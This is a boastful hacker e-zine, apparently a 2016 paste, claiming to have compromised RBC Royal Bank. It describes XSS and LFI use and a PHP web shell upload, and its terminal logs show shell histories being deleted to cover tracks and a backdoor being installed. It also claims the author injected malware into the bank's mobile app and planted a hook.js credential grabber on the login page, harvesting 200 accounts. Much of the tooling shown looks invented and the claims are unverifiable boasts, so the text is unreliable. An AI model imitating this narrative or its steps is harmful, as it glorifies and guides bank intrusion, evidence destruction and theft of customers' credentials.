How I owned the RBC

a guest
Dec 28th, 2016
_________
| _ _ |
.--.|_/ | | \_|_ .--.
/ .'`\ \ | | [ '/'`\ \
| \__. | _| |_ | \__/ |
'.__.' |_____| | ;.__/
[__|

#owntheplanet
@hackthearmy

don@otp:~$ ./dir.sh

listing dir…

[1.] introduction
[2.] web app vulnerabilities
[3.] web shell and pseudo terminal shell you say?
[4.] ./ripmobile.sh (mobile.rbcroyalbank.com)


___________________________________________________________________
[introduction] :
Congrats, you have stumbled upon something that probably no reporter and no security analyst will come across during their research, because they drown themselves in Google dorking e-zines they find in the common grounds of the internet and don't bother searching the less known, yet easy to find, e-zines. Today, I will discuss how my dog and I owned every system the RBC Royal Bank has.
___________________________________________________________________
[web app vulnerabilities]
After managing to find an XSS in the domain and an LFI in the domain, I decided to just use the LFI to my advantage and see if I could upload a shell to the domain. (Next time you are securing your domain, put restrictions on what type of file extensions users who don't have root can upload. Sincerely, ~otp)
XSS(main domain) ~~~~~~~~ https://i.imgur.com/0SPCraV.png
LFI(main domain) ~~~~~~~~ https://i.imgur.com/atyEC3n.png
___________________________________________________________________
[web shell and pseudo terminal shell you say?]
I uploaded a .php shell to their domain and decided to have some fun with uid=0(root) on all their domains, with a special focus on one domain: the mobile app they used, which was hosted at mobile.rbcroyalbank.com and which all client info would pass through. So, I decided to begin using my favorite shell, the 404 pseudo terminal shell, which would allow me to execute malware on the app and list all the files and domains comfortably from my terminal.
Webshell(main domain) ~~~~~~~ https://i.imgur.com/IX4i3jv.png
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>

don@otp:~$ ./404.sh -t http://www.rbcroyalbank.com/REDACTED-REDACTED/REDACTED-REDACTED-REDACTED/REDACTED/REDACTED-REDACTED/REDACTED.php

connection to target (SSL)…

connection complete.

running pseudo terminal session…


____
,M 6MMMMb ,M
,dM 6M' `Mb ,dM
,dMM MM MM ,dMM
,d MM MM MM ,d MM
,d MM MM MM ,d MM
,d MM YM. ,M9 ,d MM
MMMMMMMM YMMMM9 MMMMMMMM
MM MM
MM MM
MM MM .sh

coded by les miserables, educational purposes only.

404@rbcroyalbank.com:~$ use /tools/list/dirs.sh --root


/
_assets-custom/
credit-cards/
international-money-transfer/
personal-loans/
savingsspot/
uos/
customer-service/
investing/
usbanking/
mobile/
products/
visagiftcard/
cgi-bin/
includes/
myfinancetracker/
resp/
tfsa/
online/
travelinsurance/
404@rbcroyalbank.com:~$ rm -f .bash_history
404@rbcroyalbank.com:~$ rm -f .sh_history
404@rbcroyalbank.com:~$ rm -f .mysql_history
404@rbcroyalbank.com:~$ use /tools/backdoors/REDACTED-REDACTED.sh -REDACTED -set /REDACTED/REDACTED/REDACTED
404@rbcroyalbank.com:~$


___________________________________________________________________
[.ripmobile.sh (mobile.rbcroyalbank.com)]
After archiving all of their client bank account information, credit card, and web banking login (username / pass), I decided, just for the fun of it, to use every exploit that's public for gaining access to iOS, Windows Phone, BlackBerry, and Android devices and inject them into their app for mobile devices. The only words I have to say regarding this are "Oh boy", because this was the funniest thing I have done in a while, pulling off a Linux Mint hack (amirite Yevgeniy N) and exploiting all these phones. Turns out I couldn't force the application to update automatically, so I rooted a small portion of devices before I rm -f'd the malware off the app. I have mercy, yes, I am a disgrace hah. I decided then to use the phones that I rooted, and have fun with them.
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>


don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) --root (who) -update


Antoine's_Iphone5:3333:uid=0(root) gid=0(root) groups=0(root)
Alices_Ipadmini:3333:uid=0(root) gid=0(root) groups=0(root)
Juliettes_Iphone:3333:uid=0(root) gid=0(root) groups=0(root)
HanahsAndroidphone:3333:uid=0(root) gid=0(root) groups=0(root)

don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) -root HanahsAndroidphone:3333
rip@mobile:~/HanahsAndroidphone$ use /wifi/bluetooth/listen.sh

loading…
{"wifi":"on","bluetooth":"on","bluetoothLowEnergy":"100","cellular":"100"}

listening on port:3333 …

exiting…

saved under /ripmobile/root/victims/HanahsAndroidphone/listen.log

don@otp:~$


___________________________________________________________________
[itzy bitzy spider]
After messing with the mobile application, and barely touching the domain (besides archiving their entire database), and since people used the web banking more than the application, I decided to inject the web banking login pages with hook.js. I logged back into the 404 shell I placed earlier, and decided to begin using my script to inject their web banking page.
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>

404@rbcroyalbank.com:~$ ./itzybitsy.pl -i -ext "js" -d /REDACTED/hook.js -t (https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH)


[14:38:43][*] connecting to www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH …
[14:38:43][*] connected.
[14:38:43] | injecting hook.js …
[14:38:43] | configuring webpanel…
[14:38:43] | configuring pseudoterminal panel…
[14:38:43][*] user : REDACTED
[14:38:44][*] password : REDACTED
[14:38:49][INFO] IF YOU ENTER THE INCORRECT 4+ TIMES PANEL WILL SELF-RM.
[14:38:49][*] Modules loaded.
[14:38:49][*] spider is up and running!
[14:38:49][+] running on network interface: REDACTED
[14:38:49] | Hook URL: REDACTED
[14:38:49] |_ UI URL: REDACTED
[14:38:49][+] running on network interface: REDACTED
[14:38:49] | Hook URL: REDACTED/hook.js
[14:38:49] |_ UI URL: REDACTED
[14:38:49][*] Spider server running, [CONTROL-C] to exit.


>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>


After injecting the web banking with a browser hook and a user and password grabber,
I went to go get coffee. Yes, this is part of the zine, shut up.

I logged the IPs, bank account username and password of each account that passed through the 30-minute set.
(200 accounts logged)

IPs logged ~~~~~ https://i.imgur.com/MOE9Abl.png


___________________________________________________________________
[outro]
Thanks for reading my e-zine; hope you enjoyed stupid foreign banks getting FuKin OwNed. Follow my Twitter @fuckinterpol for more, and remember, #OwNtHePlaNeT. -don corelone